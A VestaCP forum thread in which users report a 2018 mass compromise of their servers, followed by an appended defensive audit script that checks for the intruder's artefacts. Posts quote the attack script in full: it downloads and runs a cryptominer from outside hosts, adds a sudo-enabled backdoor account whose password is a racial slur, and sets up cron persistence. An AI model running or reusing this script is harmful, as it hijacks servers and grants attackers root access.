Vesta Control Panel - Forum

have been HACKED ! by xaxaxa.eu

General questions about VestaCP
ScIT
Support team
Posts: 617
Joined: Mon Feb 23, 2015 4:13 pm

Os: Ubuntu 17x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by ScIT » Tue Jun 26, 2018 7:24 am

Spheerys wrote: ↑
Tue Jun 26, 2018 7:21 am
A new line was added to /etc/passwd:

Code:

sysroot:x:1007:1008::/home/sysroot:/bin/sh
And /etc/group:

Code:

sysroot:x:1008:
and /etc/gshadow:

Code:

sysroot:!::
and /etc/subuid:

Code:

and /etc/shadow:

Code:

sysroot:$6$A7jC1gBu$3kMVa4OoMDiyw8zLX7Y9X7kmyUNH9cbR6x6tSeNATJ.NlXEBE/DdFnKFCryHJAxHFOIFkUQmyKodtHLJH.QF.:17708:0:99999:7:::
/etc/sudoers (sic!!):

Code:

sysroot ALL=(ALL) ALL
(the same line repeated 52 times)
As the thread owner informed in his first post, the following script was executed:

Code:

if pgrep -x "gcc" > /dev/null
then
    echo "Running"
else
    cd;
    pkill -f xmrig;
    wget -O /tmp/gcc http://xaxaxa.eu/gcc;
    chmod +x gcc;
    wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
    /tmp/gcc -c /tmp/config_1.json;
    echo "fucktheniggers" | sudo -S useradd sysroot;
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
    (crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
    /usr/local/vesta/bin/v-update-sys-vesta-all;
fi
This would explain your created lines.

aximus
Posts: 8
Joined: Sat Nov 28, 2015 12:24 pm

Re: have been HACKED ! by xaxaxa.eu

Post by aximus » Tue Jun 26, 2018 7:25 am

I've updated the system without errors. But still I'm on version .20. /usr/local/vesta/bin doesn't seem to update anything for me, nor does apt-get update vesta. Any ideas?

ScIT
Support team
Posts: 617
Joined: Mon Feb 23, 2015 4:13 pm

Os: Ubuntu 17x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by ScIT » Tue Jun 26, 2018 7:29 am

aximus wrote: ↑
Tue Jun 26, 2018 7:25 am
I've updated the system without errors. But still I'm on version .20. /usr/local/vesta/bin doesn't seem to update anything for me, nor does apt-get update vesta. Any ideas?
Did you try to upgrade like I wrote? -> viewtopic.php?f=10&t=17183#p71558

If yes, please share the output of ./v-list-sys-vesta-updates.

Spheerys
Posts: 225
Joined: Tue Dec 29, 2015 12:36 pm

Os: Debian 7x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by Spheerys » Tue Jun 26, 2018 7:31 am

ScIT wrote: ↑
Tue Jun 26, 2018 7:29 am
If yes, please share the output of ./v-list-sys-vesta-updates.
In my case:

Code:

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-26
vesta-php    0.9.8  21   amd64  yes   2018-05-25
vesta-nginx  0.9.8  21   amd64  yes   2018-05-25

ScIT
Support team
Posts: 617
Joined: Mon Feb 23, 2015 4:13 pm

Os: Ubuntu 17x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by ScIT » Tue Jun 26, 2018 7:33 am

Spheerys wrote: ↑
Tue Jun 26, 2018 7:31 am
ScIT wrote: ↑
Tue Jun 26, 2018 7:29 am
If yes, please share the output of ./v-list-sys-vesta-updates.
In my case:

Code:

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-26
vesta-php    0.9.8  21   amd64  yes   2018-05-25
vesta-nginx  0.9.8  21   amd64  yes   2018-05-25
You're up to date, good so far. Now you need to clean your server. My point of view: do not trust an infected server anymore. Better install a new one and migrate the users there.

Spheerys
Posts: 225
Joined: Tue Dec 29, 2015 12:36 pm

Os: Debian 7x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by Spheerys » Tue Jun 26, 2018 7:34 am

Yes, you are right.
Thanks!

pksh71
Posts: 3
Joined: Tue Jun 26, 2018 7:47 am

Os: CentOS 5x
Web: nginx + php-fpm
Re: have been HACKED ! by xaxaxa.eu

Post by pksh71 » Tue Jun 26, 2018 7:57 am

Dear team,

We have around 120+ servers running in various data centers across the world. Out of these, 110 servers have VestaCP installed. All the 110 servers with VestaCP installed are hacked for CPU cryptocurrency mining by some unknown hacker.

The hacker installed xmrig mining software on our servers.

Some servers also have a script called 'gcc' installed.
How can we get rid of this issue?

Regards

jonny1960
Posts: 5
Joined: Tue Jun 26, 2018 7:46 am

Os: CentOS 6x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by jonny1960 » Tue Jun 26, 2018 8:07 am

Also was hacked tonight by a mining virus:

Code:

if pgrep -x "gcc" > /dev/null
then
    echo "Running"
else
    cd;
    pkill -f xmrig;
    rm -rf /tmp/gcc;
    rm -rf /tmp/config_1.json;
    wget -O /tmp/gcc http://bigbatman.loan/gcc;
    chmod 777 /tmp/gcc;
    wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json;
    /tmp/gcc -c /tmp/config_1.json;
    echo "fucktheniggers" | sudo -S useradd sysroot;
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
    (crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
    /usr/local/vesta/bin/v-update-sys-vesta-all;
fi

aximus
Posts: 8
Joined: Sat Nov 28, 2015 12:24 pm

Re: have been HACKED ! by xaxaxa.eu

Post by aximus » Tue Jun 26, 2018 8:11 am

ScIT wrote: ↑
Tue Jun 26, 2018 7:29 am

Did you try to upgrade like I wrote? -> viewtopic.php?f=10&t=17183#p71558

If yes, please share the output of ./v-list-sys-vesta-updates.
I did exactly as you wrote.

Code:

PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  20   amd64  no    2018-04-09
vesta-php    0.9.8  19   amd64  no    2018-01-23
vesta-nginx  0.9.8  20   amd64  no    2018-04-09
I don't mean to hijack the topic. But if I'm not receiving updates then of course my server will be targeted.

ScIT
Support team
Posts: 617
Joined: Mon Feb 23, 2015 4:13 pm

Os: Ubuntu 17x
Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu

Post by ScIT » Tue Jun 26, 2018 8:12 am

pksh71 wrote: ↑
Tue Jun 26, 2018 7:57 am
Dear team,

We have around 120+ servers running in various data centers across the world. Out of these, 110 servers have VestaCP installed. All the 110 servers with VestaCP installed are hacked for CPU cryptocurrency mining by some unknown hacker.

The hacker installed xmrig mining software on our servers.

Some servers also have a script called 'gcc' installed.
How can we get rid of this issue?

Regards
1. Update to the actual patch level (0.9.8-22); this will fix the security issue but does .
2. In my point of view: don't trust infected servers, so reinstall them. If you don't want to reinstall, try to clear the system.
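For the "try to clear the system" step, here is an added triage helper (not code from the thread, from VestaCP or from the script's author) that checks copies of passwd, sudoers and a crontab for the three artefacts ScIT walks through above: the added sysroot account, the repeatedly appended sudoers grant, and the @reboot job launching a binary from /tmp. The file paths, the allowlist argument and the sample files are this example's own constructed assumptions.

```shell
#!/bin/sh
# Added example, not from the thread, VestaCP or the script's author: offline
# triage for the three artefacts described above, run on copies of the files
# so a live host is never touched. Sample data is constructed below.

# audit_artifacts PASSWD SUDOERS CRONTAB "KNOWN USERS"
# Prints one finding per line; the fourth argument is a hypothetical,
# space-separated allowlist of accounts expected to have a shell or sudo.
audit_artifacts() {
    passwd=$1 sudoers=$2 cron=$3 known=" $4 "
    # Interactive accounts (UID >= 1000, real login shell) not allowlisted,
    # e.g. the thread's "sysroot:x:1007:1008::/home/sysroot:/bin/sh".
    while IFS=: read -r user pw uid gid gecos home shell; do
        case "$shell" in ''|*/nologin|*/false) continue ;; esac
        [ "$uid" -ge 1000 ] || continue
        case "$known" in *" $user "*) continue ;; esac
        echo "ACCOUNT $user uid=$uid shell=$shell"
    done < "$passwd"
    # Per-user sudo grants outside the allowlist; the count shows how many
    # times the line was appended (52 in the thread's /etc/sudoers).
    grep -E '^[A-Za-z0-9_.-]+[[:space:]]+ALL=' "$sudoers" | awk '{print $1}' |
        sort | uniq -c | while read -r n user; do
            case "$known" in *" $user "*) continue ;; esac
            echo "SUDOERS $user grants=$n"
        done
    # @reboot jobs whose command lives in a world-writable scratch directory.
    grep -E '^@reboot[[:space:]]+(/tmp|/dev/shm)/' "$cron" |
        while read -r tag cmd; do echo "CRONTAB $tag $cmd"; done
}

# make_sample DIR: constructed passwd, sudoers and crontab copies mixing
# benign lines with the indicators reported in the thread.
make_sample() {
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'www-data:x:33:33::/var/www:/usr/sbin/nologin' \
        'admin:x:1000:1000::/home/admin:/bin/bash' \
        'sysroot:x:1007:1008::/home/sysroot:/bin/sh' > "$1/passwd"
    { echo 'root ALL=(ALL:ALL) ALL'
      i=0; while [ "$i" -lt 52 ]; do echo 'sysroot ALL=(ALL) ALL'; i=$((i+1)); done
    } > "$1/sudoers"
    printf '%s\n' '0 3 * * * /usr/bin/certbot renew' \
        '@reboot /tmp/gcc -c /tmp/config_1.json' > "$1/crontab"
}

# Demo on the constructed copies; on a real host point the function at
# /etc/passwd, /etc/sudoers and the saved output of `crontab -l`.
dir=$(mktemp -d)
make_sample "$dir"
audit_artifacts "$dir/passwd" "$dir/sudoers" "$dir/crontab" "root admin"
rm -rf "$dir"
```

On the constructed data the run reports exactly three findings: the sysroot shell account, 52 sysroot sudo grants, and the @reboot /tmp/gcc job.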
